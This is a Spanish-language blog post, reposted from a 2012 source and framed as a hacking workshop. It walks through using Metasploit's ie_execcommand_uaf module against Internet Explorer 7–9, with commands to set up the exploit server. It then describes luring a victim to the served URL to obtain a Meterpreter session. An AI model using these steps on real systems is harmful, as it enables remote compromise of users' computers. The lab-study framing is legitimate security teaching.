Explotando IE 8

Este 0-Day lleva bastante tiempo publicado y es una falla que afecta a las versiones de Internet Explorer (7, 8 y 9 ) en sus distintas versiones de Windows. De tal manera realizaremos un taller tomando esta vulnerabilidad de IE y la exploraremos con Metasploit, así entenderemos como funciona un exploit y los peligros que una falla de seguridad conlleva.
Antes de comenzar aclarare que la entrada original fue publicada en el blog de 0verl0ad.com en 2012 y me he tomado la libertad de publicarla sin tomar crédito de aquello, solo preparo los cimientos para la construcción de un taller de hacking,  virtualizando algunas maquinas y poder estudiar el asunto mencionado.

0-day en IE y Metasploit, al ataque!!

Hace unos días aparecía una vulnerabilidad (un 0day) que afecta a diferentes versiones de Internet Explorer (IE 7, 8 y 9) y a las diversas versiones del sistema operativo de Microsoft que lo utilizan (Windows XP, Windows Vista y Windows 7). Hoy leyendo mis RSS leo en Flu-Project que Metasploit ya lo tiene implementado, así que vamos a ver como utilizarlo :D 
Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:
msfupdate
una vez este al día lo iniciamos con:
msfconsole
y veremos su bonita presentación (son geniales los banners de metasploit xD):
 
Lo siguiente es seleccionar el exploit a utilizar, para ello:
use exploit/windows/browser/ie_execcommand_uaf
Siempre que vamos a ejecutar un exploit o cualquier funcionalidad que ofrece metasploit, es recomendable el comando info que nos mostrara informacion del mismo:
info
En este caso vemos que el exploit funciona sobre:
  • IE7 en Windows XP SP3
  • IE8 en Windows XP SP3
  • IE7 en Windows Vista
  • IE8 en Windows Vista
  • IE8 en Windows 7
  • IE9 en Windows 7
 Las pruebas las se han realizado sobre un Windows 7 con IE 8, pero teóricamente soporta todas esas versiones y SO.
El siguiente paso es especificar la IP del servidor donde se preparará el exploit, es decir, nuestra IP, para ello:
set SRVHOST <IP>
en el ejemplo:
set SRVHOST 192.168.0.111
y por último lanzar el exploit:
exploit
Con esto el servidor se quedará en espera de conexiones, entonces, cuando la víctima acceda a la dirección que nos mostrará Metasploit (campo Using URL), se lanzará el exploit :D

Al final de todo el proceso, sino ha habido ningún problema, tendremos una sesión de meterpreter:
sessions -l
Listo, ya está todo el proceso, y al ser una vulnerabilidad 0day todavía no está corregida aumentando su peligrosidad.

Nos leemos en breve ;)

0 comentarios:

Publicar un comentario